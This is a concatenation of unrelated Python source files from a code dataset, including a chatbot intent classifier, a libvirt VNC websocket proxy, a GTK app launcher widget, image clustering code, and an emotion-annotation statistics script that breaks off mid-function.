my_string = "{0} *** {1}".format(my_string, str(idea))
# idea should contain noun chunks i think
return my_string
class Idea(object):
def __init__(self, verb):
self.words = set()
self.wordsArray=[]
self.verb = verb
self.words.add(verb)
self.addToken(verb)
def addToken(self, token):
for child in token.children:
if child.pos != pos_t.VERB:
self.addToken(child)
self.words.add(child)
def sortTokensToArray(self):
self.wordsArray = sorted(self.words, key=lambda Token: Token.i)
# run before sort
# removed stop words that are not directions
def removeBlockWords(self):
nonBlockedWords=set()
for token in self.words:
if notStopWord(token):
nonBlockedWords.add(token)
self.words = nonBlockedWords
def __str__(self):
return str(self.wordsArray)
# doc = nlp(u"the rain goes up into the clouds and then comes back down")
# ideas = Ideas(doc)
# print(ideas)
def getIntents(text):
doc=nlp(text)
print("doc")
print(doc)
conseptsPresent=Ideas(doc)
classifications = []
info = {}
info['response']=[]
info["category"]=[]
for idea in conseptsPresent.ideas:
# print(idea)
classifications.append(classify_baysian(idea.wordsArray, catagories, likelihood))
info['response'].append(str(idea))
info['category'].append(classify_baysian(idea.wordsArray, catagories, likelihood))
# save learning data as JSON
for i in range(len(info['response'])):
entry = dm.LearingEntry(info['category'], info['response'][i], info['response'][i])
updateLearingFile("Training_test/learning.json" , entry)
return(classifications)
def read_training_file(fpath):
catagories = Counter()
likelihood =defaultdict(Counter)
training_data = dm.loadData(fpath)
for entry in training_data:
doc =nlp(entry["phrase"])
catagories[entry["classification"]] += 1
for word in doc:
if notStopWord(word):
likelihood[entry["classification"]][word.lemma_] +=1
return (catagories, likelihood)
def printDict(dict):
print(len(dict))
for key, value in dict.items():
print(key, value)
def notStopWord(token):
return not token.is_stop or isDirection(token.lemma_)
# return the class that maxamizes postereor with min probobility
def classify_baysian(doc, priors, likelihood):
# print("************************************************")
# printDict(priors)
if len(doc) < 1:
return "garbage"
min_prob = 1E-9
max_class = (-1E6, '')
for catagory in priors:
p=priors[catagory]
n=float(sum(likelihood[catagory].values()))
for token in doc:
p = p * max(min_prob,likelihood[catagory][token.lemma_] )/ n
if p > max_class[0]:
max_class=(p, catagory)
return max_class[1]
def updateLearingFile(fpath, entry):
currentData = dm.loadData(fpath)
currentData.append(entry.getJSON())
dm.saveData(fpath, currentData)
def is_non_zero_file(fpath):
return True if os.path.isfile(fpath) and os.path.getsize(fpath) > 0 else False
def train_modle():
training_file = "Training_test/training.json"
global catagories
global likelihood
(catagories, likelihood) = read_training_file(training_file)
load_responces("Training_test/nodes.json")
def load_responces(fpath):
# csvFile = pd.read_csv(filename, low_memory=False, encoding='ISO-8859-1')
global nodes
nodes = set()
loadedNodes = dm.loadData(fpath)
for node in loadedNodes:
nodes.add(node)
for node in nodes:
print(node.name)
class Session(object):
def __init__(self, sessionId,baseNode):
self.id=sessionId
self.nodesActivated=[]
self.sortedNodes= sorted(nodes, key=lambda Node: Node.numberOfCalls)
# def nodeAvailible(self, inputContext):
# return self.nodesActivated[-1].
def forceNode(self, actionIntent, decition):
if "yesno" in actionIntent:
print("decition ", decition)
if "yes" in decition:
print("got here yes!!!!!!!!!!!!!!!!!!!!!!!")
if self.activateNode(getNode(self.nodesActivated[-1].yes_force)):
return self.getCurrentBOTResponce()
else:
print("error: could not add forced yes")
if "no" in decition:
if self.activateNode(getNode(self.nodesActivated[-1].no_force)):
return self.getCurrentBOTResponce()
else:
print("error: could not add forced no")
else:
if "restart" in decition:
self.nodesActivated=[]
if self.activateNode(getNode(actionIntent)):
return self.getCurrentBOTResponce()
else:
print("error: could not add foced node")
def nextNode(self, intents):
# self.nodesActivated
# self.wordsArray = sorted(self.words, key=lambda Token: Token.i)
for node in self.sortedNodes: #search ordered list of lest used responces
if node.name in intents: #if the node is in the list of intents
if self.activateNode(node): #try and add the node to current sesstion
return self.getCurrentBOTResponce() # if added return responce
# for intent in intents:
# if self.activateNode(getNode(str(intent))):
# return self.getCurrentBOTResponce()
# not found
return "defalt text responce"
def activateNode(self, node):
if self.isContextAvailable(node.input_context):
self.nodesActivated.append(node)
# self.sortedNodes = sorted(self.nodesActivated, key=lambda Token: Token.i
self.sortedNodes = sorted(nodes, key=lambda Node: Node.numberOfCalls)
for node in self.sortedNodes:
print(node.name," ",node.numberOfCalls)
return True
else:
return False
def printHistory(self):
histString=''
for node in self.nodesActivated:
histString = "{0} > {1}".format(histString, node.name)
print(histString)
def getCurrentBOTResponce(self):
callResponceIndex = self.nodesActivated[-1].getCallNumberInctement()
print(callResponceIndex)
return self.nodesActivated[-1].responce[callResponceIndex]
def isContextAvailable(self, input_contexts):
if len(self.nodesActivated) == 0: #first welcome node
return True
# if "pass_through" in input_contexts:
# if len(self.nodesActivated)<2:
# print("not sure how we got here with less then 2 activate nodes")
# return self.nodesActivated[-2].isContextAvailableNode(input_contexts)
# else:
return self.nodesActivated[-1].isContextAvailableNode(input_contexts)
def currentContext(self):
return self.nodesActivated[-1].output_context
class Node(object):
# def __init__(self, name, responce,input_context,output_context):
def __init__(self, nodeLoadedInfo):
# csvFile["category"][i], csvFile["reply"][i],
# csvFile["input_context"][i],csvFile["output_context"][i]
self.name = nodeLoadedInfo["classification"]
self.numberOfCalls=0
input_context = nodeLoadedInfo["input_context"]
output_context = nodeLoadedInfo["input_context"]
self.responses = []
for responce in nodeLoadedInfo["response"]:
self.responses.append(Responce(responce))
# self.yes_force = nodeLoadedInfo["yes_force"]
# self.no_force = nodeLoadedInfo["no_force"]
# this should indicate if we have gone through them all which it does not right now ********
def getCallNumberInctement(self):
currentCallIndex = self.numberOfCalls
print(self.responce)
self.numberOfCalls = (self.numberOfCalls + 1)%len(self.responce)
return currentCallIndex
# check
def isContextAvailableNode(self, input_contexts):
for input_context in input_contexts:
if input_context in self.output_context:
return True
return False
# self.availibleNodes=2
class Responce(object):
def __init__(self, responceLoaded):
self.text = responceLoaded["text"]
self.input_context = responceLoaded["input_context"]
self.output_context = responceLoaded["output_context"]
self.decisions = set()
for decision in responceLoaded["decision"]:
self.decisions.add(Decision(decision))
class Decision(object):
def __init__(self, loadedDecision):
self.name = loadedDecision["name"]
self.destination = loadedDecision["node"]
def getNode(category):
for node in nodes:
if node.name == category:
return node
print(category, " is unclasified")
for node in nodes:
if node.name == "unknown":
return node
# should never get here
return False
def startSession(ID, node):
session = Session(ID, node)
sessions.add(session)
return session
def getSession(ID):
for session in sessions:
if ID == session.id:
return session
# if not found
return startSession(ID, getNode("base"))
| StarcoderdataPython |
58259 | <gh_stars>1-10
#!/usr/bin/env python3
import re
import os
import sys
import socket
import libvirt
import logging
from http import cookies
from optparse import OptionParser
from websockify import WebSocketProxy
from websockify import ProxyRequestHandler
def get_xml_data(xml, path=None, element=None):
res = ''
if not path and not element:
return ''
tree = ElementTree.fromstring(xml)
if path:
child = tree.find(path)
if child is not None:
if element:
res = child.get(element)
else:
res = child.text
else:
res = tree.get(element)
return res
parser = OptionParser()
parser.add_option("-v",
"--verbose",
dest="verbose",
action="store_true",
help="Verbose mode",
default=False)
parser.add_option("-d",
"--debug",
dest="debug",
action="store_true",
help="Debug mode",
default=False)
parser.add_option("-H",
"--host",
dest="host",
action="store",
help="Listen host",
default='0.0.0.0')
parser.add_option("-p",
"--port",
dest="port",
action="store",
help="Listen port",
default=6080)
parser.add_option("-c",
"--cert",
dest="cert",
action="store",
help="Certificate file path",
default='cert.pem')
(options, args) = parser.parse_args()
FORMAT = "%(asctime)s - %(name)s - %(levelname)s : %(message)s"
if options.debug:
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
options.verbose = True
elif options.verbose:
logging.basicConfig(level=logging.INFO, format=FORMAT)
else:
logging.basicConfig(level=logging.WARNING, format=FORMAT)
def get_conn_data(token):
port = None
try:
conn = libvirt.open('qemu:///system')
for dom in conn.listDomainsID():
if token == dom.UUIDString():
xml = dom.XMLDesc()
console_type = get_xml_data(xml, 'devices/graphics', 'type')
port = get_xml_data(xml, f"devices/graphics[@type='{console_type}']", 'port')
conn.close()
except libvirt.libvirtError as err:
logging.error(
f'Fail to retrieve console connection infos for token {token} : {err}')
raise
return port
class CompatibilityMixIn(object):
def _new_client(self, daemon, socket_factory):
cookie = cookies.SimpleCookie()
cookie.load(self.headers.get('cookie'))
if 'token' not in cookie:
logging.error('- Token not found')
return False
console_host = 'localhost'
console_port = get_conn_data(cookie.get('token').value)
cnx_debug_msg = "Connection Info:\n"
cnx_debug_msg += f" - VNC host: {console_host}\n"
cnx_debug_msg += f" - VNC port: {console_port}"
logging.debug(cnx_debug_msg)
# Direct access
tsock = socket_factory(console_host, console_port, connect=True)
if self.verbose and not daemon:
print(self.traffic_legend)
# Start proxying
try:
self.vmsg(f"{console_host}:{console_port}: Websocket client or Target closed")
self.do_proxy(tsock)
except Exception:
raise
class NovaProxyRequestHandler(ProxyRequestHandler, CompatibilityMixIn):
def msg(self, *args, **kwargs):
self.log_message(*args, **kwargs)
def vmsg(self, *args, **kwargs):
if self.verbose:
self.msg(*args, **kwargs)
def new_websocket_client(self):
"""
Called after a new WebSocket connection has been established.
"""
# Setup variable for compatibility
daemon = self.server.daemon
socket_factory = self.server.socket
self._new_client(daemon, socket_factory)
if __name__ == '__main__':
# Create the WebSocketProxy with NovaProxyRequestHandler handler
server = WebSocketProxy(RequestHandlerClass=NovaProxyRequestHandler,
listen_host=options.host,
listen_port=options.port,
source_is_ipv6=False,
verbose=options.verbose,
cert=options.cert,
key=None,
ssl_only=False,
daemon=False,
record=False,
web=False,
traffic=False,
target_host='ignore',
target_port='ignore',
wrap_mode='exit',
wrap_cmd=None)
server.start_server()
| StarcoderdataPython |
1705563 | import unittest
from unittest.mock import Mock
from supergsl.core.types.codon import CodonFrequencyTable
from supergsl.plugins.codon_frequency.provider import CodonFrequencyTableProvider
class CodonFrequencyTableProviderTestCase(unittest.TestCase):
"""Test case for CodonFrequencyTableProvider."""
def setUp(self):
self.provider = CodonFrequencyTableProvider({})
def test_get_table(self):
"""Test that get table returns a dictionary of table info."""
table = self.provider.get_table('s_cerevisiae_4932')
self.assertTrue(isinstance(table, CodonFrequencyTable))
self.assertEqual(table.name, 's_cerevisiae_4932')
def test_resolve_import_inserts_into_symbol_table(self):
self.provider.get_table = Mock(return_value='HELLO')
results = self.provider.resolve_import(
's_cerevisiae_4932',
'thesacc'
)
self.assertEqual(results['thesacc'], 'HELLO')
| StarcoderdataPython |
1600829 | <reponame>riichi/kcc3
from badges.local_badge_client import LocalBadgeClient, PlayerIterable
from badgeupdater.models import BadgeUpdateRequest
from players.models import Player
class TestBadgeClient(LocalBadgeClient):
def get_badge_players(self, request: BadgeUpdateRequest) -> PlayerIterable:
return Player.objects.all()
| StarcoderdataPython |
3342156 | <filename>src/launcher/app_chooser.py
# coding: utf-8
"""
Contains code for the app chooser.
"""
from gi.repository import Gdk, GLib, Gio, Gtk
from aspinwall.launcher.config import config
# Used by AppIcon to find the app chooser revealer
app_chooser = None
def app_info_to_filenames(appinfo):
"""Takes a list of apps and returns their filenames."""
output = {}
for app in appinfo:
output[app.get_filename()] = app
return output
@Gtk.Template(resource_path='/org/dithernet/aspinwall/launcher/ui/appicon.ui')
class AppIcon(Gtk.FlowBoxChild):
"""Contains an app icon for the app chooser."""
__gtype_name__ = 'AppIcon'
app = None
app_icon = Gtk.Template.Child()
app_name = Gtk.Template.Child()
popover = Gtk.Template.Child()
def __init__(self, app=None):
"""Initializes an AppIcon."""
super().__init__()
self.popover.present()
if app.get_filename() in config['favorite-apps']:
self.is_favorite = True
else:
self.is_favorite = False
if app:
self.bind_to_app(app)
def bind_to_app(self, app):
"""Fills the AppIcon with an app's information."""
self.app = app
self.app_icon.set_from_gicon(app.get_icon())
self.app_name.set_label(app.get_name())
longpress_gesture = Gtk.GestureLongPress()
longpress_gesture.set_propagation_phase(Gtk.PropagationPhase.CAPTURE)
longpress_gesture.connect('pressed', self.show_menu)
self.add_controller(longpress_gesture)
# Set up context menu actions
self.install_action('favorite', None, self.favorite)
self.install_action('unfavorite', None, self.unfavorite)
if self.is_favorite:
self.action_set_enabled('favorite', False)
else:
self.action_set_enabled('unfavorite', False)
def favorite(self, app_icon, *args):
"""Adds the app to favorites."""
if app_icon.app.get_filename() not in config['favorite-apps']:
config['favorite-apps'] = config['favorite-apps'] + [app_icon.app.get_filename()]
self.is_favorite = True
self.action_set_enabled('unfavorite', True)
self.action_set_enabled('favorite', False)
app_chooser.filter.changed(Gtk.FilterChange.MORE_STRICT)
app_chooser.favorites_filter.changed(Gtk.FilterChange.LESS_STRICT)
if not app_chooser.in_search:
app_chooser.favorites_revealer.set_reveal_child(True)
def unfavorite(self, app_icon, *args):
"""Removes the app from favorites."""
if app_icon.app.get_filename() in config['favorite-apps']:
new_list = config['favorite-apps'].copy()
new_list.remove(app_icon.app.get_filename())
config['favorite-apps'] = new_list
self.is_favorite = False
self.action_set_enabled('favorite', True)
self.action_set_enabled('unfavorite', False)
app_chooser.filter.changed(Gtk.FilterChange.LESS_STRICT)
app_chooser.favorites_filter.changed(Gtk.FilterChange.MORE_STRICT)
if not new_list:
app_chooser.favorites_revealer.set_reveal_child(False)
@Gtk.Template.Callback()
def run(self, *args):
"""Opens the app represented by the app icon."""
context = Gdk.Display.get_app_launch_context(self.get_display())
self.app.launch(None, context)
app_chooser.hide()
def show_menu(self, event_controller, *args):
"""Shows the app icon menu."""
# FIXME: Newly added icons seem to keep the unfavorite action enabled;
# this fixes it, but there is probably a deeper root cause
if self.is_favorite:
self.action_set_enabled('favorite', False)
else:
self.action_set_enabled('unfavorite', False)
self.popover.show()
@Gtk.Template(resource_path='/org/dithernet/aspinwall/launcher/ui/appchooser.ui')
class AppChooser(Gtk.Box):
"""App chooser widget."""
__gtype_name__ = 'AppChooser'
# Whether we are currently searching or not
in_search = False
app_grid = Gtk.Template.Child()
favorites_revealer = Gtk.Template.Child()
favorites_grid = Gtk.Template.Child()
search = Gtk.Template.Child()
no_results = Gtk.Template.Child()
def __init__(self):
"""Initializes an app chooser."""
super().__init__()
# Set up store for app model
self.store = Gio.ListStore(item_type=Gio.AppInfo)
self.fill_model()
# Set up sort model
self.sort_model = Gtk.SortListModel(model=self.store)
self.sorter = Gtk.CustomSorter.new(self.sort_func, None)
self.sort_model.set_sorter(self.sorter)
# Set up filter model
filter_model = Gtk.FilterListModel(model=self.sort_model)
self.filter = Gtk.CustomFilter.new(self.filter_by_name, filter_model)
filter_model.set_filter(self.filter)
self.search.connect('search-changed', self.search_changed)
# Set up favorites model
self.favorites_model = Gtk.FilterListModel(model=self.store)
self.favorites_filter = Gtk.CustomFilter.new(
self.is_favorite,
self.favorites_model
)
self.favorites_model.set_filter(self.favorites_filter)
self.model = filter_model
# Set up app grid
self.app_grid.bind_model(self.model, self.bind, None)
# Set up favorites grid
self.favorites_grid.bind_model(self.favorites_model, self.bind, None)
# Show/hide the favorites depending on whether there are any
if config['favorite-apps']:
self.favorites_revealer.set_reveal_child(True)
else:
self.favorites_revealer.set_reveal_child(False)
global app_chooser
app_chooser = self
def fill_model(self):
"""Fills the favorites and app grid models."""
appinfo = Gio.AppInfo.get_all()
self.store.remove_all()
for app in appinfo:
if not Gio.AppInfo.should_show(app):
continue
self.store.append(app)
self.previous_appinfo = self.store
def update_model(self):
"""Updates the app grid model."""
_appinfo = Gio.ListStore(item_type=Gio.AppInfo)
for app in Gio.AppInfo.get_all():
if app.should_show():
_appinfo.append(app)
appinfo = app_info_to_filenames(_appinfo)
previous_appinfo = app_info_to_filenames(self.previous_appinfo)
# Comparing the stores to each other erroneously returns True
if previous_appinfo.keys() != appinfo.keys():
new_appinfo = list(set(previous_appinfo.keys()) - set(appinfo.keys())) + \
list(set(appinfo.keys()) - set(previous_appinfo.keys()))
for app_name in new_appinfo:
if app_name in previous_appinfo:
# App removed
find = self.store.find(previous_appinfo[app_name])
if find[0]:
self.store.remove(find[1])
if app_name in config['favorite-apps']:
new_list = config['favorite-apps'].copy()
new_list.remove(app_name)
config['favorite-apps'] = new_list
self.sorter.changed(Gtk.SorterChange.DIFFERENT)
self.filter.changed(Gtk.FilterChange.DIFFERENT)
self.favorites_filter.changed(Gtk.FilterChange.DIFFERENT)
else:
# App added
self.store.append(appinfo[app_name])
self.sorter.changed(Gtk.SorterChange.DIFFERENT)
self.filter.changed(Gtk.FilterChange.DIFFERENT)
self.favorites_filter.changed(Gtk.FilterChange.DIFFERENT)
if config['favorite-apps'] and not self.in_search:
self.favorites_revealer.set_reveal_child(True)
else:
self.favorites_revealer.set_reveal_child(False)
def bind(self, app, *args):
"""Binds the list items in the app grid."""
return AppIcon(app)
def filter_by_name(self, appinfo, user_data):
"""Fill-in for custom filter for app grid."""
query = self.search.get_text()
if not query:
if appinfo.get_filename() in config['favorite-apps']:
return False
return True
query = query.casefold()
if query in appinfo.get_name().casefold():
return True
if appinfo.get_generic_name():
if query in appinfo.get_generic_name().casefold():
return True
for keyword in appinfo.get_keywords():
if query in keyword.casefold():
return True
return False
def is_favorite(self, appinfo, *args):
"""
Takes a Gio.AppInfo and returns whether the app is in favorites or not.
"""
if appinfo.get_filename() in config['favorite-apps']:
return True
return False
def sort_func(self, a, b, *args):
"""Sort function for the app grid icon sorter."""
a_name = GLib.utf8_casefold(a.get_name(), -1)
if not a_name:
a_name = ''
b_name = GLib.utf8_casefold(b.get_name(), -1)
if not b_name:
b_name = ''
return GLib.utf8_collate(a_name, b_name)
def search_changed(self, search_entry, *args):
"""Notifies the filter about search changes."""
if search_entry.get_text():
self.in_search = True
self.favorites_revealer.set_reveal_child(False)
else:
self.in_search = False
self.favorites_revealer.set_reveal_child(True)
self.no_results.set_visible(False)
self.filter.changed(Gtk.FilterChange.DIFFERENT)
if self.model.get_n_items() == 0:
self.no_results.set_visible(True)
else:
self.no_results.set_visible(False)
# Select first item in list
first_item = self.app_grid.get_first_child()
if first_item:
first_item.grab_focus()
# TODO: Scroll back to top of list
@Gtk.Template.Callback()
def hide(self, *args):
"""Hides the app chooser."""
self.get_parent().set_reveal_flap(False)
self.get_native().pause_focus_manager = False
| StarcoderdataPython |
128312 | <reponame>MthBr/well-plate-light-driven-predictions<gh_stars>0
import cv2
import sys
import matplotlib.pyplot as plt
import numpy as np
#image_file = 'WellPlate_project/feature_eng/2.jpg'
image_file = 'a2_a_cropped.jpg'
print(image_file)
original_image = cv2.imread(image_file)
#img = cv2.cvtColor(original_image.astype('uint8'),cv2.COLOR_BGR2GRAY)
# convert our image from RGB Colours Space to HSV to work ahead.
img=cv2.cvtColor(original_image.astype('uint8'),cv2.COLOR_BGR2LAB)
l, a, b = cv2.split(img)
img = b; img=np.expand_dims(img,axis=2)
#cv2.imshow('image', img)
plt.figure(figsize=(10,10))
plt.imshow(img)
plt.show()
Z_tot = img.reshape((-1,img.shape[2])) #l.reshape(-1,1)
Z = np.float32(Z)
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = 3
ret,label,center=cv2.kmeans(Z,K,None,criteria,10,cv2.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
#center[2:K-1][:] = [255,255,255]
res = center[label.flatten()]
res2 = res.reshape((img.shape))
plt.figure(figsize=(10,10))
plt.imshow(res2)
plt.show()
circles = cv2.HoughCircles(res2.astype('uint8'), cv2.HOUGH_GRADIENT, 2.7, 85, param1=30,param2=90,minRadius=40,maxRadius=45)
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(res2,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(res2,(i[0],i[1]),2,(0,0,255),3)
plt.figure(figsize=(20,20))
plt.imshow(res2)
plt.xticks([]), plt.yticks([])
plt.show()
| StarcoderdataPython |
1759251 | <filename>dataAcquisition.py
from recoDataStructure import *
class DataReceiver:
"""This class helps us to read data into the program.
During the training stage, it can read data from file
and during recognition stage, it can get real time tracking data and
pass it to the Feature Extraction module."""
def __init__(self, l_or_r):
# 0 or 1, whether it's for the left or right hand
self._l_or_r = l_or_r
# data structure for real time training or recognition
self._gloveData = None
# data structure for training from file
self._gloveDataList = list()
def readDataFromFile(self, filePath):
"""Read a sample file and create a list of ARTGlove data samples"""
# read the file into a list
f = open(filePath, 'r')
lines = f.readlines()
f.close()
print(len(lines), "are read")
# create glove data and add it into the glove data list
indice = 0
limit = len(lines)
print(limit)
n = 0
while indice + 53 <= limit:
glove = self.createGloveFromFile(lines[indice:indice+53])
n += 1
self._gloveDataList.append(glove)
indice += 53
print(n,"samples are created.")
def createFingerFromFile(self, n, lines):
"""Function called by the createGloveFromFile function"""
pos_str = lines[0][0:-1].split(' ')
pos = list()
for p in pos_str:
pos.append(float(p))
ori_str = lines[1][0:-1] + ' ' + lines[2][0:-1] + ' ' + lines[3][0:-1]
ori_str = ori_str.split(' ')
ori = list()
for o in ori_str:
ori.append(float(o))
phalen_str = lines[5][0:-1].split(' ')
phalen = list()
for p in phalen_str:
phalen.append(float(p))
#print("lines[6]:",lines[6])
phaang_str = lines[6][0:-1].split(' ')
phaang = list()
for p in phaang_str:
phaang.append(float(p))
f = Finger(n, pos, ori, float(lines[4][0:-1]), phalen, phaang)
return f
def createGloveFromFile(self, lines):
"""Function called by the readDataFromFile function"""
pos_str = lines[5][0:-1].split(' ')
pos = list()
for p in pos_str:
pos.append(float(p))
ori_str = lines[6][0:-1] + ' ' + lines[7][0:-1] + ' ' + lines[8][0:-1]
ori_str = ori_str.split(' ')
ori = list()
for o in ori_str:
ori.append(float(o))
finger_name_list = ['pouce','index','majeur','annulaire','auriculaire']
i = 11
n = 0
fingers = list()
while n < 5:
fingers.append(self.createFingerFromFile(finger_name_list[n],lines[i+n*8:i+7+n*8]))
n += 1
lr = -1
if lines[3][0:-1] == 'left':
lr = 0
else:
lr = 1
g = Glove(lines[1][0:-1], 0, lines[2][0:-1], lr, int(lines[4][0:-1]), fingers, pos, ori)
return g
def readRealTimeData(self, g_frame):
""" Add a glove frame to pass later to the feature extractor """
for glove in g_frame._glove_list:
if glove._l_or_r == 1:
# use only right hand for now
self._gloveData = glove
def getOneSampleFrameFile(self):
"""Data from file, return the first data frame in the list"""
if len(self._gloveDataList) != 0:
return self._gloveDataList.pop(0)
else:
return None
def getOneSampleFrameRT(self):
return self._gloveData
def showGlovesFromFile(self):
for g in self._gloveDataList:
print(g._timestamp)
def getGloveNumberFromFile(self):
"""Return the number of samples that we create from file"""
return len(self._gloveDataList)
if __name__ == "__main__":
dr_left = DataReceiver(0)
dr_right = DataReceiver(1)
dr_left.readDataFromFile("data/final_dataset2.txt")
dr_right.readDataFromFile("data/final_dataset2.txt")
print("finish for left hand", dr_left.getGloveNumberFromFile())
print("finish for right hand", dr_right.getGloveNumberFromFile())
| StarcoderdataPython |
116102 | <reponame>gabrielsilvadev/URI-python-3<filename>1959.py<gh_stars>1-10
def entrada():
n,l = map(int,input().split())
return n,l
def perimetro(n,lado):
return n*lado
def main():
n,l=entrada()
print(perimetro(n,l))
main()
| StarcoderdataPython |
70161 | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 24 14:46:59 2017
Some personal numpy array filtering and finding intersections with indices
@author: <NAME>
"""
import numpy as np
import glob
import os
import shutil
def idx_filter(idx, *array_list):
new_array_list = []
for array in array_list:
new_array_list.append(array[idx])
return new_array_list
def intersect(*arrays):
""" This only works if arrays are sorted and unique"""
matched = np.array(list(set(arrays[0]).intersection(*arrays[1:])))
return np.array([np.where(np.in1d(array, matched))[0] for array in arrays])
def copy_dir_diff(dir1, dir2, dirout):
""" Copy files in dir1 that are missingin dir2 into dirout """
print(dir1)
fileList = glob.glob(os.path.join(dir1, '*'))
for curFullFile in fileList:
curFile = os.path.basename(curFullFile)
checkFullFile = os.path.join(dir2, curFile)
if os.path.isfile(checkFullFile):
print('{0} exist'.format(curFile))
else:
print('{0} miss'.format(curFile))
newFullFile = os.path.join(dirout, curFile)
shutil.copyfile(curFullFile, newFullFile)
| StarcoderdataPython |
95217 | #!/usr/bin/python
#
# This script generates summary statistics and raw plots for the data note
# associated with the annotations of portrayed emotions in the movie
# Forrest Gump. It is intended to serve as a more detailed description
# of the employed analysis and aggregation procedures than what is possible
# to convey in a manuscript.
#
# In order to reproduce the results, the script needs to be executed in the
# root of the extracted dataset. Summary statistics are printed with LaTeX
# markup and were directly included into the LaTeX sources of the associated
# Data note publication.
#
# Required arguments:
# 1. path to store the generated inter-observer agreement times series
# 2. path to store the generated figures
#
# The following python packages are required:
# - NumPy
# - SciPy
# - seaborn
#
# Example:
# $ python descr_stats.py /tmp /tmp
#
# This source code is (C) by <NAME> <<EMAIL>> and
# made available under the terms of the Creative Common Attribution-ShareAlike
# 4.0 International (CC BY-SA 4.0) license.
#
import numpy as np
from scipy.stats import spearmanr
# hard code the max duration of the movie stimulus
maxmovietime = 7085.28
#
# Helpers from PyMVPA
#
def plot_bars(data, labels=None, title=None, ylim=None, ylabel=None,
width=0.2, offset=0.2, color='0.6', distance=1.0,
yerr='ste', xloc=None, **kwargs):
"""Make bar plots with automatically computed error bars.
Candlestick plot (multiple interleaved barplots) can be done,
by calling this function multiple time with appropriatly modified
`offset` argument.
Parameters
----------
data : array (nbars x nobservations) or other sequence type
Source data for the barplot. Error measure is computed along the
second axis.
labels : list or None
If not None, a label from this list is placed on each bar.
title : str
An optional title of the barplot.
ylim : 2-tuple
Y-axis range.
ylabel : str
An optional label for the y-axis.
width : float
Width of a bar. The value should be in a reasonable relation to
`distance`.
offset : float
Constant offset of all bar along the x-axis. Can be used to create
candlestick plots.
color : matplotlib color spec
Color of the bars.
distance : float
Distance of two adjacent bars.
yerr : {'ste', 'std', None}
Type of error for the errorbars. If `None` no errorbars are plotted.
xloc : sequence
Locations of the bars on the x axis.
**kwargs
Any additional arguments are passed to matplotlib's `bar()` function.
"""
import pylab as pl
# determine location of bars
if xloc is None:
xloc = (np.arange(len(data)) * distance) + offset
if yerr == 'ste':
yerr = [np.std(d) / np.sqrt(len(d)) for d in data]
elif yerr == 'std':
yerr = [np.std(d) for d in data]
else:
# if something that we do not know just pass on
pass
# plot bars
plot = pl.bar(xloc,
[np.mean(d) for d in data],
yerr=yerr,
width=width,
color=color,
ecolor='black',
**kwargs)
if ylim:
pl.ylim(*(ylim))
if title:
pl.title(title)
if labels:
pl.xticks(xloc + width / 2, labels)
if ylabel:
pl.ylabel(ylabel)
# leave some space after last bar
pl.xlim(0, xloc[-1] + width + offset)
return plot
def unique_combinations(L, n, sort=False):
"""Return unique combinations form a list L of objects in groups of size n.
Parameters
----------
L : list
list of unique ids
n : int
length of the subsets to return
sort : bool, optional
if True -- result is sorted before returning
If you are intended to use only a small subset of possible
combinations, it is advised to use a generator
`xunique_combinations`.
"""
res = list(xunique_combinations(L, n))
if sort:
res = sorted(res)
return res
def xunique_combinations(L, n):
"""Generator of unique combinations form a list L of objects in
groups of size n.
Parameters
----------
L : list
list of unique ids
n : int
grouping size
Adopted from <NAME>
http://code.activestate.com/recipes/190465/
(MIT license, according to activestate.com's policy)
Also good discussions on combinations/variations/permutations
with various implementations are available at
http://mail.python.org/pipermail/python-list/2004-October/286054.html
"""
if n == 0:
yield []
else:
for i in range(len(L) - n + 1):
for cc in xunique_combinations(L[i + 1:], n - 1):
yield [L[i]] + cc
#
# Load data
#
def get_shots():
starts = np.loadtxt('movie_shots.csv')
segments = np.array((starts,
np.concatenate((starts[1:],
(maxmovietime,))))).T
return segments
def get_scenes():
starts = np.recfromcsv('movie_scenes.csv',
names=('start', 'title', 'tod', 'set'))['start']
segments = np.array((starts,
np.concatenate((starts[1:],
(maxmovietime,))))).T
return segments
def get_nsecond_segments(n=1):
max = get_scenes()[-1, 1]
return np.array((np.arange(0, max - n, n), np.arange(n, max, n))).T
def get_av_ratings():
import glob
return [np.recfromcsv(f) for f in glob.glob('raw/av*.csv')]
def get_ao_ratings():
import glob
return [np.recfromcsv(f) for f in glob.glob('raw/ao*.csv')]
def get_all_ratings():
return get_av_ratings() + get_ao_ratings()
#
# Stats
#
def get_labeled_fraction(rat, col):
# what fraction of the annotations carry values in a specific column
tot = np.sum([len(r) for r in rat])
lbl = np.sum([len(r) for r in get_labeled_ratings(rat, col)])
return float(lbl) / tot
def get_agreed_labels(ratings, col, segments, athresh=0.5, nseg_thresh=0):
# determine values for a particular column that show a minimum
# inter-observer agreement for a minimum number of time segments
# anywhere in the movie
from scipy.ndimage.measurements import label
labels = \
np.unique(
np.concatenate(
[np.unique(
np.concatenate(
[d.split() for d in r[col]]))
for r in ratings]))
found = []
for l in labels:
match = slice2segments(ratings, {col: l}, segments) > athresh
nseg = np.sum(match)
nblobs = label(match)[1]
if nblobs > nseg_thresh:
found.append((l, nseg, nblobs))
return found
def calc_bootstrapped_intercorrelation(ratings, cond1, cond2, segments):
# split the set of observers into all possible ~halves and
# compute the time series correlations of inter-oberserver
# agreement wrt annotation matching particular criteria across
# both groups
from mvpa2.misc.support import unique_combinations
N = len(ratings)
corr = []
for combo in unique_combinations(range(N), N / 2):
half1 = [ratings[i] for i in combo]
half2 = [ratings[i] for i in xrange(N) if not i in combo]
c1 = slice2segments(half1, cond1, segments) \
- slice2segments(half1, cond2, segments)
c2 = slice2segments(half2, cond1, segments) \
- slice2segments(half2, cond2, segments)
corr.append(spearmanr(c1, c2)[0])
return corr
def get_ci_stats(arr):
# convert an array of correlation scores into a LaTeX
# markup with mean and CI
m = np.mean(arr)
sem = np.std(arr) / np.sqrt(len(arr))
if np.isnan(m):
return 'n/a'
else:
if m >= 0.5:
return '\\textbf{%.3f} $\\pm$%.3f' % (m, 1.96 * sem)
else:
return '%.3f $\\pm$%.3f' % (m, 1.96 * sem)
def get_corr_ci(v1, v2):
# take to time series, compute the correlation, and yield a
# LaTeX markup of the value plus a CI (via Fisher transform.)
